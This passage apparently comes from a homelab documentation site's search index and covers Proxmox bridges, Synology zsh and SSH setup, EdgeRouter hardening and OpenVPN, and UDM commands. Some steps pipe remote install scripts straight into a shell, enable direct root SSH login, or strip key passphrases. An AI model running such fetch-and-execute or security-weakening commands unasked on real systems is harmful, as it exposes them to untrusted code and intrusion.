auto lo\niface lo inet loopback\n\niface enp12s0f4 inet manual\n\nauto vmbr0\niface vmbr0 inet static\n address 192.168.100.12/24\n gateway 192.168.100.1\n bridge-ports enp12s0f4\n bridge-stp off\n bridge-fd 0\n\niface enp7s0 inet manual\n\niface enp6s0 inet manual\n\niface enp12s0f4d1 inet manual\n\niface enp12s0f4d2 inet manual\n\niface enp12s0f4d3 inet manual\n\niface wlp5s0 inet manual\n
Info
vmbr0
is a bridge interface. It's used to provision network to virtual machines and containers on Proxmox VE Server. We can assign multiple network interfaces to the bridge interface with bridge-ports
option.
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#static-ip-bridge-configuration", "title": "Static IP Bridge Configuration", "text": "The following example shows a static IP configuration vmbr0
bridge interface, including two network interfaces enp12s0f4
and enp7s0
.
auto vmbr0\niface vmbr0 inet static\n address 192.168.100.12/24\n gateway 192.168.100.1\n bridge-ports enp12s0f4 enp7s0\n bridge-stp off\n bridge-fd 0\n
Configuring multiple network interfaces on the bridge interface will provide failover behavior when a network interface is down or disconnected - for example, when a specific switch is down.
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#static-ip-bridge-with-vlan-aware-configuration", "title": "Static IP Bridge with VLAN Aware Configuration", "text": "The following example shows a static IP as above but with VLAN Aware bridge.
auto vmbr0\niface vmbr0 inet static\n address 192.168.100.12/24\n gateway 192.168.100.1\n bridge-ports enp12s0f4 enp7s0\n bridge-stp off\n bridge-fd 0\n bridge-vlan-aware yes\n bridge-vids 2-4094\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#dhcp-bridge-configuration", "title": "DHCP Bridge Configuration", "text": "The following example shows a DHCP configuration vmbr0
bridge interface, including two network interfaces enp12s0f4
and enp7s0
.
auto vmbr0\niface vmbr0 inet dhcp\n bridge-ports enp12s0f4 enp7s0\n bridge-stp off\n bridge-fd 0\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#dhcp-bridge-with-vlan-aware-configuration", "title": "DHCP Bridge with VLAN Aware Configuration", "text": "The following example shows a DHCP as above but with VLAN Aware bridge.
auto vmbr0\niface vmbr0 inet dhcp\n bridge-ports enp12s0f4 enp7s0\n bridge-stp off\n bridge-fd 0\n bridge-vlan-aware yes\n bridge-vids 2-4094\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#personal-network-configuration", "title": "Personal Network Configuration", "text": "Here's a sample of the /etc/network/interfaces
file for a personal network:
auto lo\niface lo inet loopback\n\nauto vmbr0\niface vmbr0 inet dhcp\n bridge-ports enp12s0f4 enp12s0f4d1 enp12s0f4d2 enp12s0f4d3 enp7s0\n bridge-stp off\n bridge-fd 0\nbridge-vlan-aware yes\n bridge-vids 2-4094\n\niface enp12s0f4 inet manual\n\niface enp12s0f4d1 inet manual\n\niface enp12s0f4d2 inet manual\n\niface enp12s0f4d3 inet manual\n\niface enp7s0 inet manual\n\niface enp6s0 inet manual\n\niface wlp5s0 inet manual\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/", "title": "How to install oh-my-zsh on Synology NAS", "text": "", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#introduction", "title": "Introduction", "text": "The following steps will instruct you how to install oh-my-zsh on Synology DSM NAS.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#whats-zsh", "title": "Whats' ZSH", "text": "Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#whats-oh-my-zsh", "title": "What's Oh-My-Zsh", "text": "Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#community-packages-for-synology-dsm", "title": "Community Packages for Synology DSM", "text": "In order to install oh-my-zsh, we need to add 3rd party packages to Synology DSM. Synology Community Packages provides packages for Synology-branded NAS devices.
DSM 6 and below:
Log into your NAS as administrator and go to Main Menu \u2192 Package Center \u2192 Settings and set Trust Level to Synology Inc. and trusted publishers.
In the Package Sources tab, click Add, type SynoCommunity as Name and https://packages.synocommunity.com/
as Location and then press OK to validate.
Go back to the Package Center and enjoy SynoCommunity's packages in the Community tab.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#install-z-shell-with-modules", "title": "Install Z shell (with modules)
", "text": "Install Z shell (with modules)
from package center Community tab.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#install-git", "title": "Install Git
", "text": "Install Git
from package center Community tab.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#change-the-default-shell-to-zsh", "title": "Change The Default Shell to ZSH
", "text": "The following steps will be performed via SSH
edit ~/.profile
the file may be missing, so create it if it doesn't exist.
vi ~/.profile\n
Append the codes below to the end of the file or add if empty.
if [[ -x /usr/local/bin/zsh ]]; then\nexport SHELL=/usr/local/bin/zsh\n exec /usr/local/bin/zsh\nfi\n
Open a new SSH session to the Synology NAS; the shell should be zsh
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#install-oh-my-zsh", "title": "Install Oh My Zsh", "text": "From new SSH session with zsh
shell, install Oh My Zsh with one of the following commands:
with curl:
sh -c \"$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\"\n
with wget:
sh -c \"$(wget -O- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\"\n
At this point you should have a working oh-my-zsh
working on your Synology NAS.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Installing-vm-tools-on-virtual-machine/", "title": "Install VM Tools on Virtual Machine", "text": "On Debian:
sudo add-apt-repository universe\nsudo apt-get install qemu-guest-agent\n
On CentOS 7:
yum install -y qemu-guest-agent\n
On CentOS 8:
dnf install -y qemu-guest-agent\n
", "tags": ["synology"]}, {"location": "infrastructure/synology/auto-dsm-config-backup/", "title": "Auto DSM Config Backup", "text": "Since synology's dms doesn't provide any auto-backup for it's configuration i've made a smile script that can be run at from the \"Task Scheduler\". The script invokes synoconfbkp cli command that will dump the config file to provided folder. I use dropbox's folder in my case (This will sync my files to DropBox account). It append a date and hostname. It also checks the same folder for files older of 60 days and deletes them so your storage won't be flooded with files from older than 2 month. I've scheduled the script to run ounces a day with the \"Task Scheduler\"
To use it, create a new task in the Task Scheduler, choose a schedule, and append the script to \"Run Command\" at \"Task Settings\"; don't forget to change the destinations.
synoconfbkp export --filepath=/volume1/activeShare/Dropbox/SettingsConfigs/synologyConfigBackup/$(hostname)_$(date +%y%m%d).dss && find /volume1/activeShare/Dropbox/SettingsConfigs/synologyConfigBackup -type f -mtime +60 -exec rm -f {} \\;\n
", "tags": ["synology"]}, {"location": "infrastructure/synology/disable-dms-listening-on-80-443-ports/", "title": "Free 80,443 Ports On Synology NAS (DSM)", "text": "Synology NAS (DSM) is a network storage device, with some additional features like native support for virtualization, and docker support. One of the issues is that the default ports 80 and 443 are used by the web server even if you change the default ports of the Synology's DSM to other ports. In some cases, you want to use these ports for other purposes, such as a reverse proxy as an entry point for the web services. The following steps will help you to free the default ports 80 and 443 on the Synology NAS (DSM) for other purposes.
", "tags": ["synology", "NAS", "ports"]}, {"location": "infrastructure/synology/disable-dms-listening-on-80-443-ports/#configure-the-synology-nas-dsm-to-listen-on-other-ports", "title": "Configure the Synology NAS (DSM) to Listen on Other Ports", "text": "First, you need to configure the Synology NAS (DSM) to listen on other ports then 80, 443.
Login to the Synology NAS (DSM) as administrator user open Control Panel
and find Login Portal
under System
Under DSM
tab, change the DSM port (http) to a different port than 80, and the DSM port (https) to a different port than 443.
Click Save
to save the changes. Then, re-login to the Synology NAS (DSM) with the new port as administrator user as we did above.
", "tags": ["synology", "NAS", "ports"]}, {"location": "infrastructure/synology/disable-dms-listening-on-80-443-ports/#disable-the-synology-nas-dsm-to-listen-on-80-443-ports", "title": "Disable the Synology NAS (DSM) to Listen on 80, 443 Ports", "text": "Synology NAS (DSM) will listen on 80, 443 ports after each reboot. Therefore, the changes will be lost after each reboot. The workaround is to run the a script to free the ports 80, 443 on each time the Synology NAS (DSM) is boots.
The following one liner will free the ports 80, 443 on Nginx web server of the Synology NAS (DSM), until the Synology NAS (DSM) is rebooted. It removes the port 80, 443 from the Nginx
config and restarts the Nginx
service.
DSM 7.x.xDSM 6.x.x sed -i -e 's/80/81/' -e 's/443/444/' /usr/syno/share/nginx/server.mustache /usr/syno/share/nginx/DSM.mustache /usr/syno/share/nginx/WWWService.mustache\n\nsynosystemctl restart nginx\n
sed -i -e 's/80/81/' -e 's/443/444/' /usr/syno/share/nginx/server.mustache /usr/syno/share/nginx/DSM.mustache /usr/syno/share/nginx/WWWService.mustache\n\nsynoservicecfg --restart nginx\n
In order to persist the changes, we will create a Scheduled Task
to run the above script on each reboot.
Head to Control Panel
and find Task Scheduler
, then click Create
and select Triggered Task
- User-defined script
.
At Create Task
- General
page, fill in the following information:
Task: Disable_DSM_Listening_on_80_443 User: root Event: Boot-up Pre-task: None Enabled: Yes
At Task Settings
tab, under Run command
fill the User-defined script
with the following depending on Synology NAS (DSM) version:
DSM 7.x.xDSM 6.x.x sed -i -e 's/80/81/' -e 's/443/444/' /usr/syno/share/nginx/server.mustache /usr/syno/share/nginx/DSM.mustache /usr/syno/share/nginx/WWWService.mustache\n\nsynosystemctl restart nginx\n
sed -i -e 's/80/81/' -e 's/443/444/' /usr/syno/share/nginx/server.mustache /usr/syno/share/nginx/DSM.mustache /usr/syno/share/nginx/WWWService.mustache\n\nsynoservicecfg --restart nginx\n
Suggestion: Select the Notification when the task is terminated abnormally.
Click OK
. The new task should be created. You can check the task by clicking Run
in the Task Scheduler
page. Preferred to reboot the Synology NAS (DSM) to make sure the changes are applied at boot.
", "tags": ["synology", "NAS", "ports"]}, {"location": "infrastructure/synology/enable-ssh-root-login/", "title": "Enable Synology SSH Root Login", "text": "Synology DSM allows Linux experts to use the SSH terminal. By default you need to log in as a user and then enter \"sudo su root\" can be inconvenient, but there is the option of logging in as root directly.
", "tags": ["synology", "ssh"]}, {"location": "infrastructure/synology/enable-ssh-root-login/#section", "title": "Section", "text": "First, the DSM Control Panel is called up, Extended mode must be activated so that the required icon Terminal & SNMP appears. Under Terminal & SNMP the SSH-Service just can enable.
Connect to the Synology NAS with your admin user and password. Change user to root with the command \"sudo su\" and enter the Admin's password. Set the root
user password with the command below:
sudo synouser -setpw root 'new_root_password'\n
Edit the file /etc/ssh/sshd_config
and change the line PermitRootLogin no
to PermitRootLogin yes
.
sudo vi /etc/ssh/sshd_config\n
Reboot the Synology NAS to apply the changes.
", "tags": ["synology", "ssh"]}, {"location": "infrastructure/synology/ssh-with-rsa-key/", "title": "Synology DSM - Allow Presistent SSH With RSA Keys", "text": "As a power user, i would like to be able to connect to my Synology DSM vis SSH. The issue is that Synology DSM won't allow you to use SSH with RSA keys out of the box and only allows you to use SSH with password. In order to allow the use of SSH keys we need to perform the following steps:
", "tags": ["synology", "dsm", "ssh", "rsa-keys"]}, {"location": "infrastructure/synology/ssh-with-rsa-key/#requirements", "title": "Requirements", "text": "I will assume you have already have SSH keys generated, SSH server configured on Synology DSM
Generated SSH keys SSH server configured on Synology DSM ", "tags": ["synology", "dsm", "ssh", "rsa-keys"]}, {"location": "infrastructure/synology/ssh-with-rsa-key/#allow-user-home-at-dsm-level", "title": "Allow User Home
at DSM Level", "text": "User Home
enables creating a personal home folder for each user, except for guest. This will allow us to create the user's .ssh
folder and authorized_keys
file.
Log into Synology web UI as an administrator user Control Panel -> User & Groups -> Advanced, scroll down to \u201cUser Home\u201d Check \u201cEnable user home service\u201d, select an appropriate Location (i.e. volume1) Click \u201cApply\u201d
", "tags": ["synology", "dsm", "ssh", "rsa-keys"]}, {"location": "infrastructure/synology/ssh-with-rsa-key/#configure-ssh-folder-and-authorized_keys-file", "title": "Configure .ssh
Folder and authorized_keys
File", "text": "Log in to the NAS through SSH with the user you want to add key authorization for. The following example shows how to add will work for the active user in the SSH session.
First change the permissions of the user's home
folder to 700
sudo chmod 700 ~\n
Create the .ssh
folder and set permissions to 700
mkdir ~/.ssh && chmod 700 ~/.ssh\n
Create the authorized_keys
file and set permissions to 644
touch ~/.ssh/authorized_keys && chmod 644 ~/.ssh/authorized_keys\n
Synology's DSM SSH server supports RSA and ed25519 keys.
Now you need to copy your public keys to the authorized_keys
file, you can do it manually or use the following command:
echo <public-key-string> >> ~/.ssh/authorized_keys\n
You can do it automatically by using the following command from a client with the ssh key you want to add:
ssh-copy-id -i ~/.ssh/id_rsa <user@ip-address>\n
At this point you should be able to connect to Synology DSM via SSH using the key you just added.
", "tags": ["synology", "dsm", "ssh", "rsa-keys"]}, {"location": "infrastructure/ubiquiti/edge-router/", "title": "EdgeRouter", "text": "", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#clear-dns-forwarding-cache-via-ssh-call", "title": "Clear DNS Forwarding Cache via SSH Call", "text": "ssh user@192.168.1.1 'sudo /opt/vyatta/bin/sudo-users/vyatta-op-dns-forwarding.pl --clear-cache'\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#ssh-via-rsa-keys", "title": "SSH via RSA keys", "text": "SSH to the Edge Router: Copy the public key to /tmp folder
Run:
configure\nloadkey [your user] /tmp/id_rsa.pub\n
Check that the keys are working by opening new session
Disable Password Authentication
set service ssh disable-password-authentication\ncommit ; save\n
Done.
Enable Password Authentication if needed.
delete service ssh disable-password-authentication\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#hardening-edgerouter", "title": "Hardening EdgeRouter", "text": "This will change the GUI to port 8443, disable old cyphers, Only will listen on internal Network. assuming your EdgeRouter IP is 192.168.1.1, if not change it accordingly.
SSH to the Edge Router
configure\nset service gui listen-address 192.168.100.1\nset service gui https-port 8443\nset service gui older-ciphers disable\nset service ssh listen-address 192.168.100.1\nset service ssh protocol-version v2\nset service ubnt-discover disable\ncommit ; save\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#hardware-offloading", "title": "Hardware Offloading", "text": "For Devices: ER-X / ER-X-SFP / EP-R6 Enable hwnat and ipsec offloading.
configure\n\nset system offload hwnat enable\nset system offload ipsec enable\n\ncommit ; save\n
Disable hwnat and ipsec offloading.
configure\n\nset system offload hwnat disable\nset system offload ipsec disable\n\ncommit ; save\n
For Devices: ER-4 / ER-6P / ERLite-3 / ERPoE-5 / ER-8 / ERPro-8 / EP-R8 / ER-8-XG Enable IPv4/IPv6 and ipsec offloading.
configure\n\nset system offload ipv4 forwarding enable\nset system offload ipv4 gre enable\nset system offload ipv4 pppoe enable\nset system offload ipv4 vlan enable\n\nset system offload ipv6 forwarding enable\nset system offload ipv6 pppoe enable\nset system offload ipv6 vlan enable\n\nset system offload ipsec enable\n\ncommit ; save\n
Disable IPv4/IPv6 and ipsec offloading.
configure\n\nset system offload ipv4 forwarding disable\nset system offload ipv4 gre disable\nset system offload ipv4 pppoe disable\nset system offload ipv4 vlan disable\n\nset system offload ipv6 forwarding disable\nset system offload ipv6 pppoe disable\nset system offload ipv6 vlan disable\n\nset system offload ipsec disable\n\ncommit ; save\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#disable-update-etchosts-file-on-edgerouter", "title": "Disable, Update /etc/hosts file on EdgeRouter", "text": "Disable Auto DHCP hots:
configure\nset service dhcp-server hostfile-update disablecommit\ncommit ; save\n
Update the Host File Manually:
configure\nset system static-host-mapping host-name mydomain.com inet 192.168.1.10\ncommit ; save\n
Show DNS Forwarding
configure\nshow service dns forwarding\n
Show Hosts Config
cat /etc/hosts\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#guest-wifi-with-ubiquiti-edgerouter-and-unifi-access-points", "title": "Guest Wifi With Ubiquiti EdgeRouter and Unifi Access Points", "text": "", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#edgerouter-configuration", "title": "EdgeRouter Configuration", "text": "From the Dashboard, click Add Interface and select VLAN.
Set up the VLAN ID as you like; for this example we will use id 1003 and attach it to the physical interface of your LAN. Give it an IP address in the range of a private IP block, but make sure you end it in a /24 to specify the proper subnet (I originally did /32 as I thought it was supposed to be the exact IP address).
Click on the Services tab. Click Add DHCP Server. Set it up similar to the image below.
Click on the DNS tab under services. Click Add Listen interface and select the VLAN interface. Make sure you hit save.
At this point, you should be able to connect to your Guest Network and connect to the Internet. However, you\u2019ll be able to access the EdgeRouter as well as other devices on your LAN. Next thing you have to do is secure the VLAN.
Click on Firewall/NAT and then click on Add Ruleset. This is for packets coming into the router destined for somewhere else (not the router). Set up the default policy for Accept. Click Save.
From the Actions menu next to the Ruleset, click Interfaces.
Select your VLAN interface and the in direction.
Click Rules and then Add New Rule. Click on Basic and name it LAN. Select Drop as the Action.
Click Destination and enter 10.0.1.0/24 or whatever your LAN IP range is. Then click Save. This will drop all packets from the VLAN destined for your LAN. Save.
Repeat 1 and 2 above (name it GUEST_LOCAL). From the Interface, select the VLAN interface and the local direction. However, set up the default policy as Drop.
Add a new rule. Set it to Accept on UDP port 53.
Save. Let's continue to set up the Unifi AP
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#unifi-configuration", "title": "Unifi Configuration", "text": "If you want to limit your Guest Users Bandwidth, head over to User Groups and create a new user group called Guest. Enter bandwidth limits that are appropriate for your Internet Speed. I used 6000 down and 2500 up.
Now go to the Wireless Networks section and create a new network called \u201cGuest\u201d or whatever you want to call it.
Make sure it is enabled, give it WiFi security key, check the \u201cGuest Policy\u201d option, enter the VLAN Id you used previously and choose the Guest User Group. Save!
Done. Test Your New Guest Wifi by connecting to the Guest Wifi and browse to a website.
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#edgerouter-openvpn-configuration-443tcp", "title": "EdgeRouter OpenVPN Configuration 443/TCP", "text": "This Guide is based on Original guide form ubnt support with modifications to the VPN port and protocol
For the purpose of this article, it is assumed that the routing and interface configurations are already in place and that reachability has been tested.
ssh to the EdgeRouter
Make sure that the date/time is set correctly on the EdgeRouter.
show date\nThu Dec 28 14:35:42 UTC 2017\n
Log in as the root user.
sudo su\n
Generate a Diffie-Hellman (DH) key file and place it in the /config/auth directory. This Will take some time...
openssl dhparam -out /config/auth/dh.pem -2 4096\n
Change the current directory.
cd /usr/lib/ssl/misc\n
Generate a root certificate (replace with your desired passphrase).
./CA.pl -newca\n
example:
PEM Passphrase: Country Name: US
State Or Province Name: New York
Locality Name: New York
Organization Name: Ubiquiti
Organizational Unit Name: Support
Common Name: root
Email Address: support@ubnt.com
NOTE: The Common Name needs to be unique for all certificates.
Copy the newly created certificate + key to the /config/auth directory.
cp demoCA/cacert.pem /config/auth\ncp demoCA/private/cakey.pem /config/auth\n
Generate the server certificate.
./CA.pl -newreq\n
example:
Country Name: US
State Or Province Name: New York
Locality Name: New York
Organization Name: Ubiquiti
Organizational Unit Name: Support
Common Name: server
Email Address: support@ubnt.com
Sign the server certificate.
if you want to change the certificate expiration day use: export default_days=\"3650\" with the value of days you desire
./CA.pl -sign\n
Move and rename the server certificate + key to the /config/auth directory.
mv newcert.pem /config/auth/server.pem\nmv newkey.pem /config/auth/server.key\n
Generate, sign and move the client1 certificates.
./CA.pl -newreq\n
Common Name: client1
./CA.pl -sign\nmv newcert.pem /config/auth/client1.pem\nmv newkey.pem /config/auth/client1.key\n
(Optional) Repeat the process for client2.
./CA.pl -newreq\n
Common Name: client2
./CA.pl -sign\nmv newcert.pem /config/auth/client2.pem\nmv newkey.pem /config/auth/client2.key\n
Verify the contents of the /config/auth directory.
ls -l /config/auth\n
You should have those files:
cacert.pem cakey.pem client1.key client1.pem client2.key client2.pem dh.pem server.key server.pem Remove the password from the client + server keys. This allows the clients to connect using only the provided certificate.
openssl rsa -in /config/auth/server.key -out /config/auth/server-no-pass.key\nopenssl rsa -in /config/auth/client1.key -out /config/auth/client1-no-pass.key\nopenssl rsa -in /config/auth/client2.key -out /config/auth/client2-no-pass.key\n
Overwrite the existing keys with the no-pass versions.
mv /config/auth/server-no-pass.key /config/auth/server.key\nmv /config/auth/client1-no-pass.key /config/auth/client1.key\nmv /config/auth/client2-no-pass.key /config/auth/client2.key\n
Return to operational mode.
exit\n
Enter configuration mode.
configure\n
If EdgeRouter's Interface is on port 443, you must change it.
set service gui https-port 8443\ncommit ; save\n
Add a firewall rule for the OpenVPN traffic to the local firewall policy.
set firewall name WAN_LOCAL rule 30 action accept\nset firewall name WAN_LOCAL rule 30 description OpenVPN\nset firewall name WAN_LOCAL rule 30 destination port 443\nset firewall name WAN_LOCAL rule 30 protocol tcp\n
Configure the OpenVPN virtual tunnel interface. push-route - the router for vpn connection name-server - default gateway of the route above
set interfaces openvpn vtun0 mode server\nset interfaces openvpn vtun0 server subnet 172.16.1.0/24\nset interfaces openvpn vtun0 server push-route 192.168.100.0/24\nset interfaces openvpn vtun0 server name-server 192.168.100.1\nset interfaces openvpn vtun0 openvpn-option --duplicate-cn\nset interfaces openvpn vtun0 local-port 443\nedit interfaces openvpn vtun0\nset openvpn-option \"--push redirect-gateway\"\nset protocol tcp-passive\ncommit ; save\n
Link the server certificate/keys and DH key to the virtual tunnel interface.
set interfaces openvpn vtun0 tls ca-cert-file /config/auth/cacert.pem\nset interfaces openvpn vtun0 tls cert-file /config/auth/server.pem\nset interfaces openvpn vtun0 tls key-file /config/auth/server.key\nset interfaces openvpn vtun0 tls dh-file /config/auth/dh.pem\ncommit ; save\n
Add DNS forwarding to the new vlan vtun0 to get DNS resolving.
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#exmaple-for-clinetopvn-config", "title": "Exmaple for clinet.opvn Config", "text": "client\ndev tun\nproto udp\nremote <server-ip or hostname> 443\nfloat\nresolv-retry infinite\nnobind\npersist-key\npersist-tun\nverb 3\nca cacert.pem\ncert client1.pem\nkey client1.key\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#edgerouter-free-up-space-by-cleaning-old-firmware", "title": "EdgeRouter Free Up space by Cleaning Old Firmware", "text": "ssh to the EdgeRouter:
delete system image\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#speedtest-cli-on-edge-router", "title": "SpeedTest Cli on Edge Router", "text": "ssh to the Edge Router. installation:
curl -Lo speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py\nchmod +x speedtest-cli\n
run from the same directory:
./speedtest-cli --no-pre-allocate\n
based on https://github.com/sivel/speedtest-cli
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#enable-netflow-on-edgerouter-to-unms", "title": "Enable NetFlow on EdgeRouter to UNMS", "text": "The most suitable place to enable NetFlow is your Default gateway router. UNMS supports NetFlow version 5 and 9. UNMS only record flow data for IP ranges defined below. Whenever UNMS receives any data from a router, the status of NetFlow changes to Active
.
To show interfaces and pick the right interface:\\
show interfaces\n
Example configuration for EdgeRouter:
configure\nset system flow-accounting interface pppoe0\nset system flow-accounting ingress-capture post-dnat\nset system flow-accounting disable-memory-table\nset system flow-accounting netflow server 192.168.1.10 port 2055\nset system flow-accounting netflow version 9\nset system flow-accounting netflow engine-id 0\nset system flow-accounting netflow enable-egress engine-id 1\nset system flow-accounting netflow timeout expiry-interval 60\nset system flow-accounting netflow timeout flow-generic 60\nset system flow-accounting netflow timeout icmp 60\nset system flow-accounting netflow timeout max-active-life 60\nset system flow-accounting netflow timeout tcp-fin 10\nset system flow-accounting netflow timeout tcp-generic 60\nset system flow-accounting netflow timeout tcp-rst 10\nset system flow-accounting netflow timeout udp 60\ncommit\nsave\n
10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 100.64.0.0/10
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/cli-commands/", "title": "UDM CLI Commands List", "text": "Collection of CLI commands for the Ubiquiti Unifi Dream Machine or Dream Machine Pro.
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/cli-commands/#common-udm-commands", "title": "Common UDM Commands", "text": "Open shell to unifi podman container (udm pro)
unifi-os shell\n
Show Sensors information including: UDM temperature, fan speed, and voltage.
sensors\n
Show ARP Table
arp -a\n
Display All Listening Ports on the UDM Device
netstat -plant\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/cli-commands/#udm-commands-list", "title": "UDM Commands List", "text": "Collection of commands for your Unifi Dream Machine or Dream Machine Pro.
Description UDM/UDM-P SSH Command show DHCP leases (to NSname) cat /mnt/data/udapi-config/dnsmasq.lease show version info show system hardware and installed software ubnt-device-info summary show cpu tempeture ubnt-systool cputemp show fan speed ubnt-fan-speed show uptime uptime show ip route netstat -rt -n show ppp summery pppstats show current user whoami show log cat /var/log/messages show interface summary ifstat show interfaces ifconfig show other Ubiquiti devices on local LAN segment (ubnt-discovery) ubnt-tools ubnt-discover show config (wireless) cat /mnt/data/udapi-config/unifi packet capture tcpdump shutdown poweroff reload reboot show ipsec sa ipsec statusall factory reset factory-reset.sh show system burnt in MAC address ubnt-tools hwaddr show unifi server logs cat /mnt/data/unifi-os/unifi/logs/server.log show unifi server setttings cat /mnt/data/unifi-os/unifi-core/config/settings.yaml show unifi server http logs cat /mnt/data/unifi-os/unifi-core/logs/http.log show unifi server http logs (errors) cat /mnt/data/unifi-os/unifi-core/logs/errors.log show unifi server discovery log cat /mnt/data/unifi-os/unifi-core/logs/discovery.log show unifi system logs cat /mnt/data/unifi-os/unifi-core/logs/system.log Restarts the UnifiOS Web interface /etc/init.d/S95unifios restart show ip arp (show arp) and IPv6 neighbours arp -a OR ip neigh show tunnel interfaces ip tunnel show Show Sensors information sensors Open shell to unifi podman container unifi-os shell tcpdump tcpdump -w", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/", "title": "UDM WAN Failover Telegram Notifications", "text": "This script will send a message to a Telegram chat when WAN connection is changed to failover and back to normal.
Github Repository: UDM Failover Telegram Notifications
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#changelog", "title": "Changelog", "text": " 2023-02-22 - Added support for multiple UDM versions 1.x, 2.x and 3.x ", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#persistence-on-reboot", "title": "Persistence on Reboot", "text": "This script need to run every time the system is rebooted since the UDM overwrites crons every boot. This can be accomplished with a boot script. Flow this guide: UDM / UDMPro Boot Script
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#compatibility", "title": "Compatibility", "text": "", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#installation", "title": "Installation", "text": "curl -s https://raw.githubusercontent.com/fire1ce/UDM-Failover-Telegram-Notifications/main/install.sh | sh\n
Set your Telegram Chat ID and Bot API Key at
$DATA_DIR for 1.x = /mnt/data $DATA_DIR for 2.x and 3.x = /data
$DATA_DIR/UDMP-Failover-Telegram-Notifications/failover-notifications.sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#config", "title": "Config", "text": "Parameters Description telegram_bot_API_Token Telegram Bot API Token telegram_chat_id Chat ID of the Telegram Bot echo_server_ip IP of a server to test what interface is active (Default 1.1.1.1) run_interval Interval to run a failover check (Default 60 seconds)", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#uninstall", "title": "Uninstall", "text": "Delete the UDMP-Failover-Telegram-Notifications folder
rm -rf $DATA_DIR/UDMP-Failover-Telegram-Notifications\n
Delete on boot script file
rm -rf $DATA_DIR/on_boot.d/99-failover-telegram-notifications.sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#usage", "title": "Usage", "text": "At boot the script with create a cronjob that will run once. This is done to prevent boot blocking.
Manual run to test notifications:
$DATA_DIR/UDMP-Failover-Telegram-Notifications/failover-notifications.sh\n
It's strongly recommended to perform a reboot in order to check the on boot initialization of the notifications
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/", "title": "Persistent On Boot Script", "text": "When UDM or UDM PRO reboots or the firmawre is updated the custom changes you made will be lost. This Script will allow you to initialize your custom changes on every boot or firmware update. without losing your custom changes.
Github Repository: unifios-utilities - on-boot-script
